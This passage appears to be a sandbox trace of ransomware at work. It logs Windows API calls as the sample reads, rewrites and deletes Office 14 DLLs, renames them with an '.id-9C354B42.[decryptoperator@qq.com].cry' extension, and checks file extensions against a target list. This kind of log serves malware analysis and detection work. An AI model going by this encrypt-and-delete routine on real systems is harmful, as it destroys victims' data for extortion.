"c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.240] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=55680) returned 1 [0053.240] CloseHandle (hObject=0x224) returned 1 [0053.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll")) returned 0x20 [0053.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.240] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.240] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.241] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.241] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0053.241] GetLastError () returned 0x0 [0053.241] ReadFile (in: hFile=0x224, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0xd980, lpOverlapped=0x0) returned 1 [0053.330] WriteFile (in: hFile=0x16c, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xd990, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xd990, lpOverlapped=0x0) returned 1 [0053.332] ReadFile (in: hFile=0x224, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.332] WriteFile (in: hFile=0x16c, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xfa, lpOverlapped=0x0) returned 1 [0053.332] SetEndOfFile (hFile=0x16c) returned 1 [0053.334] CloseHandle (hObject=0x16c) returned 1 [0053.334] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.334] SetEndOfFile (hFile=0x224) returned 1 [0053.335] CloseHandle (hObject=0x224) returned 1 [0053.335] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.335] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll")) returned 1 [0053.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0053.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0053.335] lstrlenW (lpString=".doc") returned 4 [0053.335] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0053.335] lstrlenW (lpString=".docx") returned 5 [0053.336] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0053.336] lstrlenW (lpString=".pdf") returned 4 [0053.336] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0053.336] lstrlenW (lpString=".xls") returned 4 [0053.336] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0053.336] lstrlenW (lpString=".xlsx") returned 5 [0053.336] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0053.336] lstrlenW (lpString=".ppt") returned 4 [0053.336] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0053.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0053.336] lstrlenW (lpString=".zip") returned 4 [0053.336] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0053.336] lstrlenW (lpString=".rar") returned 4 [0053.336] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0053.336] lstrlenW (lpString=".bz2") returned 4 [0053.336] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0053.336] lstrlenW (lpString=".7z") returned 3 [0053.336] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0053.336] lstrlenW (lpString=".dbf") returned 4 [0053.336] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0053.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0053.336] lstrlenW (lpString=".1cd") returned 4 [0053.336] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0053.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0053.336] lstrlenW (lpString=".jpg") returned 4 [0053.336] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0053.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0053.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0053.337] lstrlenW (lpString=".doc") returned 4 [0053.337] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0053.337] lstrlenW (lpString=".docx") returned 5 [0053.337] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0053.337] lstrlenW (lpString=".pdf") returned 4 [0053.337] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0053.337] lstrlenW (lpString=".xls") returned 4 [0053.337] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0053.337] lstrlenW (lpString=".xlsx") returned 5 [0053.337] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0053.337] lstrlenW (lpString=".ppt") returned 4 [0053.337] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0053.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0053.337] lstrlenW (lpString=".zip") returned 4 [0053.337] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0053.337] lstrlenW (lpString=".rar") returned 4 [0053.337] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0053.337] lstrlenW (lpString=".bz2") returned 4 [0053.337] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0053.337] lstrlenW (lpString=".7z") returned 3 [0053.337] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0053.337] lstrlenW (lpString=".dbf") returned 4 [0053.337] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0053.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0053.337] lstrlenW (lpString=".1cd") returned 4 [0053.337] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0053.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0053.337] lstrlenW (lpString=".jpg") returned 4 [0053.337] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0053.337] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0053.337] lstrlenW (lpString="MSSOAPR3.DLL") returned 12 [0053.338] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.338] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=41864) returned 1 [0053.338] CloseHandle (hObject=0x224) returned 1 [0053.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll")) returned 0x20 [0053.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.339] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.339] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.339] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.339] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0053.339] GetLastError () returned 0x0 [0053.339] ReadFile (in: hFile=0x224, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0xa388, lpOverlapped=0x0) returned 1 [0053.435] WriteFile (in: hFile=0x16c, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xa390, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xa390, lpOverlapped=0x0) returned 1 [0053.437] ReadFile (in: hFile=0x224, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.437] WriteFile (in: hFile=0x16c, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.437] SetEndOfFile (hFile=0x16c) returned 1 [0053.437] CloseHandle (hObject=0x16c) returned 1 [0053.437] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.437] SetEndOfFile (hFile=0x224) returned 1 [0053.438] CloseHandle (hObject=0x224) returned 1 [0053.438] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.439] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll")) returned 1 [0053.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0053.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0053.439] lstrlenW (lpString=".doc") returned 4 [0053.439] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.439] lstrlenW (lpString=".docx") returned 5 [0053.439] lstrcmpiW (lpString1=".docx", lpString2="3.DLL") returned -1 [0053.439] lstrlenW (lpString=".pdf") returned 4 [0053.439] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.439] lstrlenW (lpString=".xls") returned 4 [0053.439] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.439] lstrlenW (lpString=".xlsx") returned 5 [0053.439] lstrcmpiW (lpString1=".xlsx", lpString2="3.DLL") returned -1 [0053.439] lstrlenW (lpString=".ppt") returned 4 [0053.439] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0053.439] lstrlenW (lpString=".zip") returned 4 [0053.439] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.439] lstrlenW (lpString=".rar") returned 4 [0053.439] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.439] lstrlenW (lpString=".bz2") returned 4 [0053.439] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.439] lstrlenW (lpString=".7z") returned 3 [0053.439] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0053.439] lstrlenW (lpString=".dbf") returned 4 [0053.439] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0053.440] lstrlenW (lpString=".1cd") returned 4 [0053.440] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0053.440] lstrlenW (lpString=".jpg") returned 4 [0053.440] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0053.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0053.440] lstrlenW (lpString=".doc") returned 4 [0053.440] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.440] lstrlenW (lpString=".docx") returned 5 [0053.440] lstrcmpiW (lpString1=".docx", lpString2="3.DLL") returned -1 [0053.440] lstrlenW (lpString=".pdf") returned 4 [0053.440] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.440] lstrlenW (lpString=".xls") returned 4 [0053.440] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.440] lstrlenW (lpString=".xlsx") returned 5 [0053.440] lstrcmpiW (lpString1=".xlsx", lpString2="3.DLL") returned -1 [0053.440] lstrlenW (lpString=".ppt") returned 4 [0053.440] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0053.440] lstrlenW (lpString=".zip") returned 4 [0053.440] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.440] lstrlenW (lpString=".rar") returned 4 [0053.440] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.440] lstrlenW (lpString=".bz2") returned 4 [0053.440] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.440] lstrlenW (lpString=".7z") returned 3 [0053.440] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0053.441] lstrlenW (lpString=".dbf") returned 4 [0053.441] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0053.441] lstrlenW (lpString=".1cd") returned 4 [0053.441] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0053.441] lstrlenW (lpString=".jpg") returned 4 [0053.441] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.441] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0053.441] lstrlenW (lpString="ACECORE.DLL") returned 11 [0053.441] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.442] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=3213192) returned 1 [0053.442] CloseHandle (hObject=0x224) returned 1 [0053.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll")) returned 0x20 [0053.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.443] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0053.444] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.444] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0x0) returned 1 [0053.444] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0053.444] ReadFile (in: hFile=0x224, lpBuffer=0x3950058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3950058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.492] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x1057d8, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0053.492] ReadFile (in: hFile=0x224, lpBuffer=0x3990058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3990058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.642] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0053.643] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x2d0788, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0053.643] ReadFile (in: hFile=0x224, lpBuffer=0x39d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x39d0058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.794] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.794] WriteFile (in: hFile=0x224, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2d9fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0054.115] SetEndOfFile (hFile=0x224) returned 1 [0054.171] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0054.171] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0054.171] WriteFile (in: hFile=0x224, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0054.173] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x1057d8, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0054.173] WriteFile (in: hFile=0x224, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0054.177] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x2d0788, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0054.177] WriteFile (in: hFile=0x224, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0054.183] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0054.183] CloseHandle (hObject=0x224) returned 1 [0054.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.183] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0054.183] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0054.183] lstrlenW (lpString=".doc") returned 4 [0054.183] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.183] lstrlenW (lpString=".docx") returned 5 [0054.183] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1 [0054.183] lstrlenW (lpString=".pdf") returned 4 [0054.183] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.183] lstrlenW (lpString=".xls") returned 4 [0054.183] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.183] lstrlenW (lpString=".xlsx") returned 5 [0054.183] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1 [0054.184] lstrlenW (lpString=".ppt") returned 4 [0054.238] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0054.238] lstrlenW (lpString=".zip") returned 4 [0054.238] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.238] lstrlenW (lpString=".rar") returned 4 [0054.238] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.238] lstrlenW (lpString=".bz2") returned 4 [0054.238] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.238] lstrlenW (lpString=".7z") returned 3 [0054.239] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0054.239] lstrlenW (lpString=".dbf") returned 4 [0054.239] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0054.239] lstrlenW (lpString=".1cd") returned 4 [0054.239] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0054.239] lstrlenW (lpString=".jpg") returned 4 [0054.239] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0054.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0054.239] lstrlenW (lpString=".doc") returned 4 [0054.239] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.239] lstrlenW (lpString=".docx") returned 5 [0054.239] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1 [0054.239] lstrlenW (lpString=".pdf") returned 4 [0054.239] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.239] lstrlenW (lpString=".xls") returned 4 [0054.239] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.239] lstrlenW (lpString=".xlsx") returned 5 